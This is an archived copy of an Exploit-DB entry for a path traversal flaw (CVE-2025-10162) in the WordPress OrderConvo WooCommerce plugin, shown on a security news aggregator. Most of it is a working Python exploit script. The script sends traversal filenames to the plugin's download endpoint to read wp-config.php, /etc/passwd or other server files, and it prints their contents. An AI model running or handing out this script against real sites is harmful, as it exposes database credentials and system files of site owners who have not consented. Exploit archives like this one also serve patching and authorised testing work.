CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ⬡ Vulnerabilities & CVEs Jun 01, 2026

[webapps] WordPress OrderConvo 14 - Path Traversal

Exploit DB Archived Jun 01, 2026 ✓ Full text saved

WordPress OrderConvo 14 - Path Traversal

Full text archived locally
✦ AI Summary · Claude Sonnet


    EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING WordPress OrderConvo 14 - Path Traversal EDB-ID: 52607 CVE: 2025-10162 EDB Verified: Author: DIAMORPHINE Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-06-01 Vulnerable App: # Exploit Title: WordPress OrderConvo 14 - Path Traversal # Date: 05-31-2026 # Exploit Author: Diamorphine # Vendor Homepage: https://www.najeebmedia.com/ # Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/ # Version: 13.5 # Tested on: Debian # CVE : CVE-2025-10162 import httpx import asyncio import argparse from urllib.parse import urljoin import sys async def main(base_url, file): async with httpx.AsyncClient(verify=False) as client: try: print('[*] Checking connection to target') req = await client.get(url=base_url) if req.status_code == 200: print('[+] The target is alive, exploiting\n') else: print(f'[-] Unable to connect to the target. Code: {req.status_code}') sys.exit() except: print(f'[-] Problem with connection to the target.') sys.exit() exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}') r = await client.get(url=exp_url) if len(r.text) != 0: print(r.text) else: print("[*] Unable to read file") parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162") parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local") parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)") args = parser.parse_args() if __name__ == '__main__': asyncio.run(main(args.url, args.filename)) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services
    💬 Team Notes
    Article Info
    Source
    Exploit DB
    Category
    ⬡ Vulnerabilities & CVEs
    Published
    Jun 01, 2026
    Archived
    Jun 01, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗